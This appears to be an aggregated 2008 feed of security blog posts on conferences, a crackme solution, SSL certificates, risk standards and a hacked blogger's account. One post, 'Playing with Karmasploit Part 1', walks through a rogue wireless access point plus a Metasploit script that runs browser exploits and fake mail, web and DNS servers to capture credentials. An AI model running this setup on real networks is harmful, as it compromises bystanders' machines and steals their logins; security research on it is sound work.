Spliced feed for Security Bloggers Network |
Friday News and Notes [Digital Bond] Posted: 15 Aug 2008 06:59 AM CDT
|
SecuraBit Episode 8 [SecuraBit] Posted: 15 Aug 2008 06:01 AM CDT On this Episode of SecuraBit Jason Mueller Chris Gerling Anthony Gartner Back from three week hiatus. Defcon and BlackHat Defcon Parties: Core Impact Party EthicalHacker.net party Cisco Party Isight Party I-hacked Party StillSecure Freakshow Party ChicagoCon: Boot Camps: Oct 27 - 31 Conference: Oct 31 - Nov 1: http://www.chicagocon.com/ Defcon Badges Ran out of Badges on first day: http://search.twitter.com/search?q=Defcon+badges+out TV-B-Gone built into the badges: http://www.hackaday.com/2008/08/05/defcon-16-badge-details-released/ Servo hacks the badges -http://edge.i-hacked.com/new-defcon16-details Podcasters Meetup - [...] This posting includes an audio/video/photo media file: Download Now |
F-Secure Khallenge Level 1 [ISIS Blogs] Posted: 15 Aug 2008 12:18 AM CDT Thanks to Aleksey and Phn1x for dealing with my constant stream of questions while reversing this. You’d think it was the first time I opened a debugger! The level 1 challenge was a binary that asked for input and, if your input was correct, printed out an e-mail address you could use to get the level 2 binary. The Khallenge is a contest of speed, so the first person to get to and beat level 3 wins. Unfortunately, I solved level 1 after the contest ended and the level 2 and 3 binaries aren’t online yet, so no prizes and no info on those.
The first thing I did was open the binary is a disassembler and try to get a general feel for it. This would help me develop an attack strategy. In IDA, you can easily identify that your input is being XOR’d almost a dozen times and with a global variable somewhere. It quickly overwhelmed me, so I took out a pen and paper and started writing things down. I also had lots of problems identifying exact addresses and byte offsets in IDA (I haven’t used it much before), so I switched to Immunity Debugger at this point. The first set of instructions your input needs to pass through are at addresses if(strlen(input) != 4) fail(); else ... The XORs start immediately after this check. After staring at it for a while, you will figure out that your input is being used as a key to decrypt a global variable located at 0×690030D0. This global variable becomes the answer e-mail. I wrote out the encrypted e-mail in a column and mapped the XOR’d input bytes to it. Here is that table (encompasses addresses 69001095 to 690010F6): e-mail @ 0x690030D4 input @ 69003100 e-mail[0]: 0x07 XOR input[0] e-mail[1]: 0x2E XOR input[1] e-mail[2]: 0x35 XOR input[2] e-mail[3]: 0x29 XOR input[3] e-mail[4]: 0x70 XOR input[0] e-mail[5]: 0x20 XOR input[1] e-mail[6]: 0x76 XOR input[2] e-mail[7]: 0x68 XOR input[3] After all the XOR’s, the application starts to check the final values of 4 select bytes in the e-mail buffer. e-mail[4]: 0x70 XOR input[0] == 0x32 e-mail[1]: 0x2E XOR input[1] == 0x61 e-mail[6]: 0x76 XOR input[2] == 0x30 e-mail[3]: 0x29 XOR input[3] == 0x79 If you do the XOR in reverse, you can find out the input they are looking for: 0x70 XOR 0x32 = input[0] = 0x42 = B 0x2E XOR 0x61 = input[1] = 0x4F = O 0x76 XOR 0x30 = input[2] = 0x46 = F 0x29 XOR 0x79 = input[3] = 0x50 = P Run the executable, put BOFP into the prompt, all the XORs happen, all the checks pass, and the e-mail buffer decrypts to “Easy2o08.” Done! Thanks again Aleksey and Phn1x! |
This is a normal upgrade for me… [BumpInTheWire.com] Posted: 14 Aug 2008 11:51 PM CDT Wow…getting our LANsight Security Management Appliances upgraded has been less than easy. Luckily El Sidekick considered this a normal upgrade for him. I can always count on him to find the good in most anything. We did manage to get them upgraded to the 5.1 code tonight (just finished at 11:30 tonight) by stepping up to a code level between what we were running and the latest version. The first opinion of the new interface is that it is a definate improvement. The dashboard has more/better detail as to what has actually been going on the environment. One thing I would like to see, which I don’t think the previous versions had either, is the hostname displayed on the dashboard somewhere. Having two sites with two different management appliances, sometimes it can get confusing when looking at both of them at the same time. In other news…Alan is back! Sounds like he’s been through quite the ordeal. Sit down and have a cyber-beer. You deserve it! |
Posted: 14 Aug 2008 08:10 PM CDT Yeah, the posts have been coming slow lately but some of you may have heard about a little event going on in China called the Olympics. Chinese hackers watching sporting events, worried about foreign hackers attacking them…my world is completely upside down. The boys and girls from 3800hk.com, the largest Chinese hacker training site, take over 20 of their “employees” out to enjoy the games. Plus, they love them some Mr. Yao Ming: More pictures of their adventure here if you are interested…but pretty much the same as these. |
Bye-Bye Passwords - Maybe? [NovaInfosecPortal.com] Posted: 14 Aug 2008 05:47 PM CDT I came across an interesting New York Times story by Randall Stross over the weekend that discusses how we should be replacing passwords with information cards and how so-called single sign-on (SSO) services (e.g., OpenID and I’m sure any commercial product SSO efforts as well) just don’t add the security we need. Here are the relevant snippets from the article:”The solution urged by the experts is to abandon passwords - and to move to a fundamentally different model, one in which humans play little or no part in logging on. Instead, machines have a cryptographically encoded conversation to establish both parties’ authenticity, using digital keys that we, as users, have no need to see. In short, we need a log-on system that relies on cryptography, not mnemonics. As users, we would replace passwords with so-called information cards, icons on our screen that we select with a click to log on to a Web site. The click starts a handshake between machines that relies on hard-to-crack cryptographic code.” “We won’t make much progress on information cards in the near future, however, because of wasted energy and attention devoted to a large distraction, the OpenID initiative. OpenID promotes “Single Sign-On”: with it, logging on to one OpenID Web site with one password will grant entrance during that session to all Web sites that accept OpenID credentials. OpenID offers, at best, a little convenience, and ignores the security vulnerability inherent in the process of typing a password into someone else’s Web site.” Strangely enough, Microsoft seems to be involved in this new information card technology. It sounds a lot like Microsoft’s well-known CardSpace technology. As a matter of fact, Microsoft is part of a new Information Card Foundation (ICF) along with other heavyweights such as Equifax, Google, Novell, Oracle and PayPal. But then Microsoft is also a supporter of OpenID. How ironic… The only issue I see with the way these information cards are them being desktop icons that you click to login as described in the New York Times story. When I’m logging into Windows at the beginning of the day, what do I do then? I won’t have access to these information card icons yet. Passwords anyone? Plus this doesn’t alleviate the problem of computers being infected with malware. If I can click it, a Trojan or virus can too. I agree with all the points about OpenID and other SSO efforts… but they’re such so darn convenient! There are a lot of questions that need to be addressed here and I’m sure we’ll all be learning a lot more about this technology as it evolves. What do you think about this new authentication technology? Does your organization have plans to replace passwords with information cards? Here’s a link to the New York Times article. |
Posted: 14 Aug 2008 05:40 PM CDT There’s been a bit of debate on the blogs recently over the role of analysts, and how they pay their bills. It started with the Hoff, and Alan Shimel followed up (no link right now due to Alan’s blog issues). I know Chris wasn’t calling me out on this one (because he told me), but I do recognize I put a lot of content out there that people trust to help make decisions, and it’s only fair they know of any potential conflicts of interest I might have. I’m not going to get into a big debate over the role of analysts in the IT industry. I think the good ones offer tremendous value, but I’m clearly biased. Where I’m not biased is in my positions. No matter who pays the bills, I recognize that most of my value in the security world is my objectivity. Everything I write is for the end user, even if a piece is sponsored by vendor or written internally for an investor. As soon as I forget that, my career is over. It’s one thing for me to claim that, and another for you to believe it. I don’t assume you’ll take me at my word, and that’s why I throw everything out here on the blog and leave it for public comment. If you think I’m biased, call me on it. I don’t think I’ve ever deleted a a comment, other than spam and personal insults. Insulting argument is okay, but I decline to host pointless insults — there are lots of other places for that, and this is *my* (our) soapbox — you can set up your own website or find another board if you just want to flame online; there’s no shortage of venues. We also encourage vendors to comment, as long as they identify themselves clearly if it’s on something related to their offerings. It’s also only fair you know who pays my bills, and my policies on papers and webcasts. Right now about 85% of our income is from vendors, with the remaining 15% split between investment clients, end users, and media companies (magazines/conferences). We’re expensive for consultants, and don’t typically engage in long-term projects, which cuts out a lot of paid end user business, although we do a ton of (short) free calls, emails, and meetings when I’m traveling. As for papers and webcasts, the rules are we (Adrian and myself) will work with a vendor on a topic, but they have no input on the content. To make this work we give them detailed outlines of what they can expect before we write it, and all contracts are written so that if they don’t like the content, we go our separate ways and we won’t charge them. In all cases we (Securosis) own the content and only license it to the vendors for (usually) a year. And yes, I’ve walked away from deals, although we haven’t had one fall apart after the draft was written, since we prefer to work out any conflicts before we start. Also, all the content appears first on the blog for public input- this is the best way we can think of to be transparent. So who pays the bills? I can’t talk about our strategy clients, but we’ve done public work (papers/webcasts/speaking) with all of the following vendors (I’m assuming you don’t care about the media companies):
There aren’t any surprises here- I’ve announced all those papers, webcasts, and such here on the blog already, along with who the sponsor was. No, I can’t talk about all our clients, but if they aren’t on that list, they’ve never sponsored any content. Another thing we do to balance objectivity is work with competitors- we won’t engage in contracts that exclude us from working with competitors. This was all already public, so I’m not giving away any big secrets. Also, don’t take this as a “look how great we are!” post; we’re doing this for transparency, not marketing. We’ve also worked with SANS, CMP Media, TechTarget, some large financials (doesn’t everyone?), and a few investment types. That doesn’t count the end users we don’t charge. That’s it. If you think we’re biased, call us on it and we won’t delete the comment. Our goal is to be as open as possible so you know where the information you’re reading comes from. Do we push some technologies? Yep, because we think they can help. We’ve definitely turned away work for things we don’t believe in. -rich |
DAVIX 1.0.1 Officially Launched [iplosion security] Posted: 14 Aug 2008 05:39 PM CDT After months of building and testing, the long anticipated release of DAVIX - The Data Analysis & Visualization Linux® - arrived last week during Blackhat/DEFCON in Las Vegas. It is a very exiting moment for me and I am curious to see how the product is received by audience. So far the ISO image has been downloaded at least 600 times from our main distribution server. Downloads from the mirrors are not accounted. Additionally, Raffael Marty’s book Applied Security Visualization is now available in print. DAVIX was built with this particular book in mind. If you are looking for a methodology and not just a workable tool set, then the book is what you are looking for. The book covers all steps from the very basics to complete case studies and contains many hands-on examples. Therefore, the book together with DAVIX 1.0.1 is the perfect match for getting you started with security visualization. For a preview of the book’s content check out the rough cuts version. All those eager to get their hands dirty immediately can find a description as well as the download links for the DAVIX ISO image on the DAVIX homepage. I wish you happy visualizing! |
Blog Moved! [Security Uncorked] Posted: 14 Aug 2008 02:22 PM CDT Blog Moved! The SecurityUncorked blog has moved to a new hosting location. The domains www.SecurityUncorked.com and .net will still take you to the blog site, but please discontinue use of this link (http://securityuncorked.squarespace.com). For now, this old location will remain active until all/most incoming links have been updated but please be sure to update your favorites or links to www.SecurityUncorked.com thanks! jj |
First Amazon for Applied Security Visualization Book [Raffy - Security Data Visualization] Posted: 14 Aug 2008 02:21 PM CDT I just saw the first Amazon review for my book. I just don’t understand why the person only gave it four stars, instead of five Just kidding. Thanks for the review! Keep them coming! |
Playing with Karmasploit Part 1 [Carnal0wnage Blog] Posted: 14 Aug 2008 01:53 PM CDT HD Moore released some documentation to get karmasploit working with the framework. First you'll have to get an updated version of aircrack-ng because you'll need airbase-ng. I had 0.9.1 so I had to download and install the current stable version (1.0-rc1). If you have an old version you should be good dependency-wise. Ah, but there is a patch,(I used the 2nd patch), so apply that before you make/make install. You may also need a current version of madwifi drivers (I used 0.9.4). I recently updated my kernel and that had hosed all my madwifi stuff up, so I had to reinstall. Ok, so got an updated version of aircrack, patched airbase-ng, and madwifi drivers and can inject packets? Let's continue. Let's do our aireplay-ng test to see if things are working: root@WPAD:/home/cg# aireplay-ng --test ath40 19:55:44 Trying broadcast probe requests... 19:55:44 Injection is working! 19:55:46 Found 5 APs 19:55:46 Trying directed probe requests... 19:55:46 00:1E:58:33:83:71 - channel: 4 - 'vegaslink' 19:55:52 0/30: 0% 19:55:52 00:14:06:11:42:A2 - channel: 4 - 'VEGAS.com' 19:55:58 0/30: 0% 19:55:58 00:13:19:5F:D1:D0 - channel: 6 - 'stayonline' 19:56:03 Ping (min/avg/max): 20.712ms/26.964ms/31.267ms Power: 14.80 19:56:03 5/30: 16% 19:56:03 00:14:06:11:42:A0 - channel: 4 - 'cheetahnetwork' 19:56:09 0/30: 0% 19:56:09 00:14:06:11:42:A1 - channel: 4 - 'Adult***Vegas' 19:56:15 0/30: 0% Look's like we are good. Now just follow the steps in the documentation, I installed dhcpd3 and set up my conf file, I did a svn update on the metasploit trunk, made sure the sqlite3 stuff was working and then tweaked my karma.rc file for the IP address I was on. Pretty straightforward. With all the config files set up its pretty easy to get things going. root@WPAD:/home/cg# airbase-ng -P -C 30 -v ath40 02:59:55 Created tap interface at0 02:59:55 Access Point with BSSID 00:19:7E:8E:72:87 started. 02:59:57 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte" 02:59:58 Got broadcast probe request from 00:14:A5:2E:BE:2F 02:59:59 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte" 03:00:02 Got broadcast probe request from 00:90:4B:C1:61:E4 03:00:03 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte" 03:00:05 Got broadcast probe request from 00:14:A5:48:CE:68 03:00:07 Got broadcast probe request from 00:90:4B:EA:54:01 03:00:09 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte" 03:00:12 Got directed probe request from 00:13:E8:A8:B1:93 - "stayonline" ----snip------ 03:01:34 Got an auth request from 00:21:06:41:CB:50 (open system) 03:01:34 Client 00:21:06:41:CB:50 associated (unencrypted) to ESSID: "tmobile" 03:04:19 Got an auth request from 00:1B:77:23:0A:72 (open system) 03:04:19 Client 00:1B:77:23:0A:72 associated (unencrypted) to ESSID: "LodgeNet **You get the idea... airbase-ng creates an at0 tap so you have to configure it and set the mtu size (all this if from the karmasploit documentation) root@WPAD:/home/cg/evil/msf3# ifconfig at0 up 172.16.1.207 netmask 255.255.255.0 root@WPAD:/home/cg/evil/msf3# ifconfig at0 mtu 1400 root@WPAD:/home/cg/evil/msf3# ifconfig ath40 mtu 1800 After we get our IP stuff straight we need to tell the dhcpd server which interface to hand out IPs on. root@WPAD:/home/cg/evil/msf3# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0 Internet Systems Consortium DHCP Server V3.0.5 Copyright 2004-2006 Internet Systems Consortium. All rights reserved. For info, please visit http://www.isc.org/sw/dhcp/ Wrote 4 leases to leases file. Listening on LPF/at0/00:19:7e:8e:72:87/172.16.1/24 Sending on LPF/at0/00:19:7e:8e:72:87/172.16.1/24 Sending on Socket/fallback/fallback-net After that we run our karma.rc file within using msfconsole. root@WPAD:/home/cg/evil/msf3# ./msfconsole -r karma.rc =[ msf v3.2-release + -- --=[ 304 exploits - 124 payloads + -- --=[ 18 encoders - 6 nops =[ 79 aux resource> load db_sqlite3 [*] Successfully loaded plugin: db_sqlite3 resource> db_create /root/karma.db [*] The specified database already exists, connecting [*] Successfully connected to the database [*] File: /root/karma.db resource> use auxiliary/server/browser_autopwn resource> setg AUTOPWN_HOST 172.16.1.207 AUTOPWN_HOST => 172.16.1.207 resource> setg AUTOPWN_PORT 55550 AUTOPWN_PORT => 55550 resource> setg AUTOPWN_URI /ads AUTOPWN_URI => /ads resource> set LHOST 172.16.1.207 LHOST => 172.16.1.207 resource> set LPORT 45000 LPORT => 45000 resource> set SRVPORT 55550 SRVPORT => 55550 resource> set URIPATH /ads URIPATH => /ads resource> run [*] Starting exploit modules on host 172.16.1.207... [*] Started reverse handler [*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto [*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto [*] Server started. [*] Started reverse handler [*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava [*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava [*] Server started. [*] Started reverse handler [*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface [*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface [*] Server started. [*] Started reverse handler [*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp [*] Server started. [*] Started reverse handler [*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings [*] Server started. [*] Started reverse handler [*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype [*] Server started. [*] Started reverse handler [*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject [*] Server started. [*] Started reverse handler [*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe [*] Server started. [*] Started reverse handler [*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core [*] Server started. [*] Started reverse handler [*] Server started. [*] Using URL: http://0.0.0.0:55550/ads [*] Local IP: http://127.0.0.1:55550/ads [*] Server started. [*] Auxiliary module running as background job resource> use auxiliary/server/capture/pop3 resource> set SRVPORT 110 SRVPORT => 110 resource> set SSL false SSL => false resource> run [*] Server started. [*] Auxiliary module running as background job resource> use auxiliary/server/capture/pop3 resource> set SRVPORT 995 SRVPORT => 995 resource> set SSL true SSL => true resource> run [*] Server started. [*] Auxiliary module running as background job resource> use auxiliary/server/capture/ftp resource> run [*] Server started. [*] Auxiliary module running as background job resource> use auxiliary/server/capture/imap resource> set SSL false SSL => false resource> set SRVPORT 143 SRVPORT => 143 resource> run [*] Server started. [*] Auxiliary module running as background job resource> use auxiliary/server/capture/imap resource> set SSL true SSL => true resource> set SRVPORT 993 SRVPORT => 993 resource> run [*] Server started. [*] Auxiliary module running as background job resource> use auxiliary/server/capture/smtp resource> set SSL false SSL => false resource> set SRVPORT 25 SRVPORT => 25 resource> run [*] Server started. [*] Auxiliary module running as background job resource> use auxiliary/server/capture/smtp resource> set SSL true SSL => true resource> set SRVPORT 465 SRVPORT => 465 resource> run [*] Server started. [*] Auxiliary module running as background job resource> use auxiliary/server/fakedns resource> unset TARGETHOST Unsetting TARGETHOST... resource> set SRVPORT 5353 SRVPORT => 5353 resource> run [*] Auxiliary module running as background job resource> use auxiliary/server/fakedns resource> unset TARGETHOST Unsetting TARGETHOST... resource> set SRVPORT 53 SRVPORT => 53 resource> run [*] Auxiliary module running as background job resource> use auxiliary/server/capture/http resource> set SRVPORT 80 SRVPORT => 80 resource> set SSL false SSL => false resource> run [*] Server started. [*] Auxiliary module running as background job resource> use auxiliary/server/capture/http resource> set SRVPORT 8080 SRVPORT => 8080 resource> set SSL false SSL => false resource> run [*] Server started. [*] Auxiliary module running as background job resource> use auxiliary/server/capture/http resource> set SRVPORT 443 SRVPORT => 443 resource> set SSL true SSL => true resource> run [*] Server started. [*] Auxiliary module running as background job resource> use auxiliary/server/capture/http resource> set SRVPORT 8443 SRVPORT => 8443 resource> set SSL true SSL => true resource> run [*] Server started. [*] Auxiliary module running as background job msf auxiliary(http) > Next post we'll see karmasploit in action. |
Over 50% of client systems are EV aware [Tim Callan's SSL Blog] Posted: 14 Aug 2008 12:48 PM CDT We recently hit a very cool milestone, which is that over half the client systems in use today are capable of distinguishing between Extended Validation SSL Certificates and traditional certificates. In other words, the combined market share of IE7, IE8 (very small), Firefox 3, and Opera 9.5 adds up to in excess of 52% of browsers in use. What's especially cool about that is it's an increase of almost 3% in a single month, which is quite a growth trajectory. People have been writing about this milestone, such as this blogger at DaniWeb. The blogger questions how well six or seven thousand online businesses compare to the millions of Web sites that are out there, and I think that's a question that deserves an answer. It's important to distinguish between the mass of Web sites out there that are strictly publishing content from the considerably smaller subset that actually engage in some sort of online business. EV SSL today very much is focused on those sites where consumers are asked to share sensitive information with a business, something like an account login or a credit card number or personally identifiable information. These are the pieces of information that criminals want to steal, and these are the sites that phishing and malware and other attacks are directed after. A consumer doesn't need protection from phishing attacks when visiting your personal blog or Star Wars fan site or even your company's brochureware site. It's only where the actual commerce takes place. Therefore, you shouldn't consider the full footprint of Web sites in the world but rather this subset that is conducting business. I don't know exactly how to measure that number, but I expect it's orders of magnitude smaller than the number of total Web sites out there. Now, there's an implication in this posting that maybe in the long run sites without commerce taking place will still want an EV cert in order to demonstrate their genuine identity. I think that is a possibility down the road, but today we're really focused on those sites where there is information to protect. |
UPDATES GALORE! or, THE PRONOUN “WE” MEANS YOU AND ME! [RiskAnalys.is] Posted: 14 Aug 2008 12:29 PM CDT Originally Posted: 13 Aug 2008 10:24 AM CDT Reposted due to server issues. So much traveling, so little blogging. Sorry everyone. I've gotta say first that I really enjoyed meeting readers and friends of the blog this past two weeks. Today, allow me to update you on FAIR and the movement towards a formal, open standard. There's a couple of cool things going on in our little risk-world. First, The Open Group Security Forum continues to move towards a formal adoption of FAIR. WHAT DO YOU MEAN "WE" - YOU GOT A STANDARDS BODY IN YOUR POCKET OR SOMETHING? Our meeting in Chicago a few weeks ago was great, but also slightly disturbing for me. I got pronoun-confusion syndrome. I'm used to using the "we" pronoun to refer to RMI, or Jack and myself as we vet the models. So without even thinking I would said "we have been looking at how loss occurs, and may want to change the model some" and The Open Group Members freaked out (rightfully so). Adrian Seccombe gently reminded me that the "we" was now the Security Forum, and that "we" didn't go changing things at will without vetting against each other. Man I love this stuff. I get to run our thoughts and ideas past some great folks now - you know, those smart people who tend to have really complex problems and are trying hard to solve them. Formal Adoption: Soon, Very Soon Now Formal Adoption basically means we've made this document, everyone is close to saying that they generally like it, and once that finally happens then "bam", we're ready to move onward and upward with better things (see Cookbooks, below). We've got a couple of changes to the current document that have been requested that aren't a big deal. For example, one request is that we make some statement about general applicability of FAIR to risk domains outside of the IT realm. But once additions like that and others are done, this long process should be complete. New Document Moving Towards Public Release: We've got a basic document that should be public in the next few weeks on "What Makes a Good Risk Assessment Methodology" - written by yours truly and Jack. It's a very high-level document, and serves two purposes:
When this doc is deemed ready for public consumption I'll be sure to post on this blog here. COOKBOOKS, EUROPEAN AGENCIES, AND, IRON CHEF "RISK" - WHOSE CUISINE WILL REIGN SUPREME? One interesting thing that came up in the Chicago meeting was that ENISA (The European Network and Information Security Agency) developed a very nice document that reviewed something like 18 different risk assessment methodologies against their Criteria for Goodness. FAIR was one of the ones they reviewed, and we (the royal "we" used there to include all us FAIR-Folk) did awfully well. Things of interest:
So The Open Group Security Forum decided that though we could create a new document and totally p0wn any future ENISA bake-off, there wasn't much demand for the development of that documentation by the membership - a point which was made quite apparent at the beginning of the discussion when one large European company CISO asked "What's ENISA?" Relevancy is everything, I suppose. But that second item up there - the one about helping rather than competing with other "risk assessment methodologies" - really struck a chord. So "we" (The Security Forum) are going to develop some "Cookbooks" that basically are high-level documents that say "If you want to use FAIR with (OCTAVE/COSO/CoBIT/Whatever) here's how it fits, makes it better, and improves your life. I'm pretty excited about these, and our first document looks like it's going to be COSO integration. THE OPEN GROUP SECURITY FORUM - THEY'RE A TRUSTING BUNCH (WITH QUALIFICATION, OF COURSE) Finally, many people have asked me "Why work with The Open Group?" There are many reasons, to be sure, but I will give you one example. Members of the Security Forum there are not only great at vetting the model and getting consensus on risk and risk factors - but they're quick to start applying. So in Chicago, I thought I'd be talking about FAIR and the standard and fighting groupthink. Nope. Not at all. In fact, the forum members spent more time suddenly discussing use of FAIR in a new Trust Model they're developing. So all of the sudden, I'm part of a new and exciting project to develop a Trust Model - how cool is that? While formal adoption of the Trust Model will be necessarily long and deliberate - the collaboration and development is happening much faster than I can keep up with. But if you all will allow me, it will help me get my head around it all by blogging about it later this week. So be prepared to read about me dealing in "Trust" a little bit. |
I'm back! [StillSecure, After All These Years] Posted: 14 Aug 2008 12:12 PM CDT It has certainly been an interesting week. If there is anything else you want to know about me that has not already been posted, please feel free to send me your questions. As most of you know, on Sunday morning my blog was hijacked/hacked as well as my yahoo mail address and the domain for this blog. A lot of my personal information from these sources were posted on a public message list, along with some particularly hateful, ignorant, anti-Semitic ranting. This event while traumatic has also resulted in some positives. First of all let me say that I cannot go into a lot of the details of how this took place, as I am working with the authorities in this matter. Secondly, let me say that all of the information exposed was my own personal information. StillSecure infrastructure was not pierced or exposed at all, though the StillSecure SAT team treated this as a major breach and pulled out all of the stops in investigating and protecting our corporate infrastructure. All of the above notwithstanding, it was not easy. Of course part of me would like to just be in a room with some of the people (and I use that term loosely) who committed this crime and take care of this, but that is probably not going to happen (one can hope though). In some way I feel that in order to make steel, iron has to be put through the fire. This event has resulted in steel being made. Where before I viewed security as a business that I was in, security from here on in will be a much more passionate endeavor for me. In many ways this has made me truly a security person. You will see a much deeper commitment by me in keeping the slime of the world from being successful. I am going to do everything I can to making myself, my family and all of us more secure. Security for me has gone from a business to a way of life. I am also extremely humbled and grateful for all of the help that so many of you have rendered over this week. I never truly felt part of the security "community" until this week. Over the coming days I am going to talk about what you should do if this happens to you. However, having friends and support in the industry is something that most of us just don't have. The security community has reached out and picked me up by the bootstraps, performing incredible acts of kindness and generosity in recovering from this. I realize now that in my years in this industry I have made some great friendships. On top of this, the people I have made friends with are just incredible people! I will detail some of these acts and people in days and weeks to come. For now though know that I will never forget and will do my best to be worthy of your kindness and help. I think some of the other security bloggers in the community are going to speak out on this as well. I will be interested in what they have to say. In case any of you are wondering, I will not stop blogging and speaking out. I would never let the likes of these people silence or intimidate me. In truth the fact that they targeted me tells me that I must have struck a nerve or did some good work, that they would feel it necessary to attack me. In looking at the list of some of the names targeted along with me, I was almost honored to be included in such a prestigious group. I recognize that my blog and StillSecure is pretty well known and I guess that this shows that I am a target. For now my blog will remain sparse. As I continue to build it back up, I want to make sure that everything that is going in is clean of any malicious code. Stay tuned for more to come and thanks for sticking with me! |
Upping the stakes for insane spam titles.... [Vitalsecurity.org - A Revolution is the Solution] Posted: 14 Aug 2008 11:56 AM CDT |
Certifiably Silly [Emergent Chaos] Posted: 14 Aug 2008 11:21 AM CDT Over at "The Security Practice," Michael Barrett writes about "Firefox 3.0 and self-signed certificates." Neither he or I are representing our respective employers. ...almost everyone who wants to communicate securely using a browser can afford an SSL certificate from CAs such as GoDaddy, Thawte, etc. The cost of single certificates from these sources can only be described as nominal.There are all sorts of use cases where $29 is not chump change. For example, I own about 8 domains, that's $240 in "security taxes." People in the third world would like to communicate securely. But most importantly, the idea assumes that it's ok to have an infrastructure which is mostly unencrypted, and we may only trust encryption only after the certificate priests bless it. When I wrote about turning on "opportunistic encryption for PostFix," my goal was encrypting all email. There's no need for a CA. The threat model is passive adversaries, and there are lots of those. My company is a major target of phishing, and as such we’ve spent quite a bit of time researching what anti-phishing approaches work We published a whitepaper on this topic (which can be found on the company blog at www.thepaypalblog.com), which explains this in detail. However, a couple of relevant conclusions are that: 1) the vast majority of users simply want to be protected, 2) there’s no single “silver bullet”, and 3) that what we describe as “safer browsers” such as IE 7, and Firefox 3.0 are a significant part of the solution based on their improvements in user visible security indicators and secure-by-default behaviors.You can't always get what you want. Really, most people have little understanding of the issues. I think this is in large part because we've been talking down to them, in some part because the issues are complex, and in some part because it's not important enough for them to want to become educated. It's especially not important enough in light of debates like this one. We should try (sometime) to give people what they need. I think we'd agree that the vast majority of users want, need and deserve protection that's as simple and effective as we can make it. I don't think blocking self-signed certs is a large part of that goal. I conflated two or three separate ideas in that last sentence, and I should explain them. The general logic is that most users should never be presented with a security dialog that gives them a choice – if they are, there’s typically at least a 50:50 chance that the wrong decision will be made. Instead, the browser should make the decision for them. However, in the case of self-signed certificates it’s almost impossible to see how any technology can disambiguate between legitimate uses and criminal ones.Even viewed through the lens presented, the self-signed experience doesn't make perfect sense, unless you start with the assumption that a $29 SSL cert has some useful security value. I don't believe it does. What it does is get rid of the 'self-signed' warnings. There are cheaper and easier ways to do that. Most of the certificates out there are signed by a company that the relying consumers have never heard of. There's just not that much verification that can be done for $29. Today, anyone who's broken into a company's mail server can buy a fake cert with a stolen credit card. Now, Michael's employer is under massive attack. I am sympathetic to their desire to improve things, and I applaud a lot of things that they do. For example, their use of one time password tokens is great. I also think there's great value to pushing people to recent browsers. At the same time, it's sensible for them to want to shift risk-part of me even welcomes the risks and attacks hitting the CAs. But I think that imposing yet another security tax, based on a static analysis of attackers, and some certificate authority pixie dust isn't going to help things for very long. And given the very real costs and the very fuzzy benefits, I think that breaking self-signed certificates is the wrong approach. What's the right approach? I wrote "Preserving the Internet Channel Against Phishers" three years ago. I think that the advice isn't silly at all. |
Which Iceberg's Bigger? [ImperViews] Posted: 14 Aug 2008 11:20 AM CDT When I was writing the tip of the iceberg post I was excited from the thought that the overall damage of the data loss problem is much higher then reported. According to the Wall Street Journal, The Federal Trade Commission estimates nearly $50 billion is lost annually as a result of identity theft and credit-card fraud, with part of it absorbed by banks. In other words, not only the numbers are probably much higher than reported and therefor estimated by the FDC, it also seems like the bigger data loss events are a direct result of one of the following causes:
SecureSphere covers all those use cases. In other words, the portion of the problem that can be addressed by SecureSphere is very big. Huge. |
OPC UA Assessment Series: Part 1 [Digital Bond] Posted: 14 Aug 2008 08:56 AM CDT Digital Bond has just completed a security assessment report on the OPC Unified Architecture [UA] protocol, and we will be issuing a series of blog posts supported with SCADApedia content on the results. The assessment included both a paper security review of the multi-part OPC UA specification and an application assessment of the OPC Foundation’s Software Development Kit [SDK]. The SDK consists of a communication stack that vendors can build OPC UA applications on top of as well as sample client and server applications. The OPC UA security controls are in the communication stack. You can think of this as an assessment of a library with the sample client and server exercising the library. This is an ideal time to review OPC UA security. The specifications are complete enough to support a review, and the SDK that many vendors will use to develop OPC UA client and server applications is out in beta, and OPC UA is not yet used in production systems. So by identifying and correcting vulnerabilities now, we can prevent them from getting deployed and avoid the reluctance and difficulty in making changes in operational systems. The tentative organization of this series is:
One last point that is important to highlight in this introduction is the OPC Foundation’s interest in security. The OPC Foundation took an attitude that is still all too rare. They were eager and supportive of this assessment. In addition to the specification and SDK that any member can get, the OPC Foundation also provided the source code. In return, Digital Bond provided the OPC Foundation the full assessment report including findings and recommendations. In discussions throughout the assessment it was very clear the OPC Foundation wanted to identify any security problems, and they wanted to fix them. In fact, you will note that Part 7 will list how the OPC Foundation has addressed and corrected the majority of the findings. We are aware a lot of this is already done or in process, but we will hold off on Part 7 until the revised specification and SDK are available. |
Security Briefing: August 14th [Liquidmatrix Security Digest] Posted: 14 Aug 2008 07:28 AM CDT Yesterday was a whirlwind but, at the very least I was productive. Tried my “loud music while working” trick again. Worked like a champ. Click here to subscribe to Liquidmatrix Security Digest!. And now, the news…
Tags: News, Daily Links, Security Blog, Information Security, Security News |
